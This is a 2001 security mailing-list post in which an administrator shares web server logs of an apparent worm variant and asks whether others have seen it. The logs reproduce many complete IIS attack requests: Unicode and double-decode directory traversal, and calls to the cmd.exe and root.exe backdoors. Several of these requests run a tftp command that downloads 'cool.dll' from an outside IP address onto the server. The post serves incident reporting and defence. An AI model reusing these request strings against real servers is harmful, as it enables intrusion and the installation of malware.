Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

New Worm Variant?

From: Aj Effin Reznor <aj () reznor com>
Date: Mon, 29 Oct 2001 23:19:32 -0800 (PST)

Anyone seen a new worm doing something like this?

Checking back through my logs, I haven't had a NIMDA instance yet looking
for httpodbc.dll .  Caught my eye.  Anyone else?  (Yes, some produce a
code 200 rather than 404, that's to be expected on this system).

Log times are in PST

[29/Oct/2001:17:08:22 -0800] "GET /scripts/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll 
HTTP/1.0" 200 438 "-" "-"
[29/Oct/2001:17:08:35 -0800] "GET /scripts/httpodbc.dll HTTP/1.0" 404 332 "-" "-"
[29/Oct/2001:17:08:44 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 384 "-" "-"
[29/Oct/2001:17:08:52 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 
200 436 "-" "-"
[29/Oct/2001:17:08:53 -0800] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 330 "-" "-"
[29/Oct/2001:17:09:02 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:11 -0800] "GET 
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:21 -0800] "GET 
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET 
/c/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:09:30 -0800] "GET /c/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:09:40 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:09:52 -0800] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:01 -0800] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET 
/d/winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 449 "-" "-"
[29/Oct/2001:17:10:11 -0800] "GET /d/httpodbc.dll HTTP/1.0" 404 326 "-" "-"
[29/Oct/2001:17:10:20 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:10:30 -0800] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 
465 "-" "-"
[29/Oct/2001:17:10:38 -0800] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 
465 "-" "-"
[29/Oct/2001:17:10:47 -0800] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 
465 "-" "-"
[29/Oct/2001:17:10:55 -0800] "GET /scripts/..%255c../httpodbc.dll HTTP/1.0" 200 393 "-" "-"
[29/Oct/2001:17:11:03 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
431 "-" "-"
[29/Oct/2001:17:11:12 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
 HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:21 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll
 HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:30 -0800] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll
 HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:11:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:11:48 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 
431 "-" "-"
[29/Oct/2001:17:11:57 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
 HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:06 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll
 HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:15 -0800] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll
 HTTP/1.0" 200 486 "-" "-"
[29/Oct/2001:17:12:24 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:12:33 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 459 "-" 
"-"
[29/Oct/2001:17:12:43 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll
 HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:12:55 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll
 HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:04 -0800] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll
 HTTP/1.0" 200 514 "-" "-"
[29/Oct/2001:17:13:13 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll 
HTTP/1.0" 200 442 "-" "-"
[29/Oct/2001:17:13:24 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:13:33 -0800] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:13:42 -0800] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:13:51 -0800] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:14:00 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
[29/Oct/2001:17:14:10 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:14:19 -0800] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:14:28 -0800] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:14:37 -0800] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:14:45 -0800] "GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:14:53 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 411 "-" "-"
[29/Oct/2001:17:15:07 -0800] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:15:19 -0800] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:15:28 -0800] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 
466 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0" 200 394 "-" "-"
[29/Oct/2001:17:15:37 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:38 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 333 "-" "-"
[29/Oct/2001:17:15:50 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 414 "-" "-"
[29/Oct/2001:17:15:59 -0800] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 
200 469 "-" "-"
[29/Oct/2001:17:16:08 -0800] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 
200 469 "-" "-"
[29/Oct/2001:17:16:17 -0800] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 
200 469 "-" "-"
[29/Oct/2001:17:16:26 -0800] "GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0" 200 397 "-" "-"
[29/Oct/2001:17:16:37 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 410 "-" "-"
[29/Oct/2001:17:16:46 -0800] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 
465 "-" "-"
[29/Oct/2001:17:16:55 -0800] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0" 200 
465 "-" "-"
[29/Oct/2001:17:17:04 -0800] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2063.81.8.131%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 
465 "-" "-"
[29/Oct/2001:17:17:13 -0800] "GET /scripts/..%252f../httpodbc.dll HTTP/1.0" 200 393 "-" "-"



-aj.




----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: